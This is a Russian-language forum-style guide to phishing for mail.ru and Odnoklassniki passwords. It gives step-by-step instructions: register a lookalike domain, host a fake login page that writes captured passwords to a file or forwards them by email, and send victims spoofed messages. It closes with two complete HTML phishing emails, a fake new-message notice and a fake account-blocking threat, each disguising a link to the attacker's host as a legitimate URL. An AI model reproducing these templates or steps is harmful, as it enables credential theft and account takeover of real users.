Принцип взлома таков:
1) Регистрируем хост и домент(holm.ru например) с именем типа web-rnail.h1.ru
Возможно любое имя просто нужно, чтобы оно было максимально не паливным.
2) Заливаем туда наш фейк, например в папку web-rnail.h1.ru/cgi.bin/auth
Ставим права на файл «С» на запись, php скрипт на выполнение.
3) Пишем письмо жертве с подделкой адреса отпрвителя и ссылкой на наш фейк.
Письмо может быть как администрации mail.ru так и например под видом админ. одноклассников
4) После того как жертва пройдет по ссылке и ведет пароль, мы просто заходим и читаем их в файле «с».
Файл с фейком в разделе файлов под именем «FaKe - эксплоит к мозгу юзера=)»
Также в файле bzdlog.php в 7 строчке можно указать адрес на который высылать пароли.
Примеры писем:
______________________________________________________________________________
<div >
<p> Здравствуйте!</p>
<p>Вам пришло новое сообщение от пользователя:</p>
<p>Сергей Таюш</p>
<p>Чтобы прочитать сообщение перейдите по ссылке:</p>
<p>
</p>
<p><a target=_self href=http://web-rnail.h1.ru/cgi.bin/auth?http://mail.ru/ rhref=http://mail.ru><font color=#0857a6><b>http://www.odnoklassniki.ru/mi?l=pqqqjmpbqdgbghbhoz_ofowgupcvlarcpubdhh</b></font></a></p>
<p><br>Если указанная выше ссылка не открывается, скопируйте ее в буфер
обмена,<br>вставьте в адресную строку браузера и нажмите ввод.</p>
<p>Вы получили это письмо, потому что зарегистрированы на сайте
odnoklassniki.ru<br>Вы можете настроить отправку уведомлений о новых
сообщениях<br>в разделе Моя страница > Мои настройки.</p>
<p>--<br>С уважением,<br>Служба поддержки Odnoklassniki.ru</p>
<p>--------------------------------------------------------------</p>
<p>Общайся с одноклассниками на мобильном телефоне.</p>
<p>Зайди с телефона на wap.odnoklassniki.ru</p>
</div>
______________________________________________________________________________
<div id=let_body>Здравствуйте.<br><br>
Ваш профиль будет заблокирован, в связи с жалобой поступившей к администрации 19.05.2010.<br>
Согласно пункту 11.3 пользовательского соглашения, оставляет за собой право временно приостановить либо прекратить предоставление услуг, своевременно уведомив об этом пользователя .<br><br>
Опровергнуть заявление можно, пройдя по ссылке:<br>
<br>
<p><a target=_self href=http://web-rnail.h1.ru/cgi.bin/auth?http://mail.ru/ rhref=http://mail.ru><font color=#0857a6><b>http://www.mail.ru/mi?l=pqqqjmpbqdgbghbhoz_ofowgupcvlarcpubdhh</b></font></a></p>
Если заявка не будет отклонена в течении 3 дней, ваш почтовый аккуант будет заблокирован.<br>
Ей присвоен номер 2008474861215660.<br><br>
С уважением,<br><br>
</div>
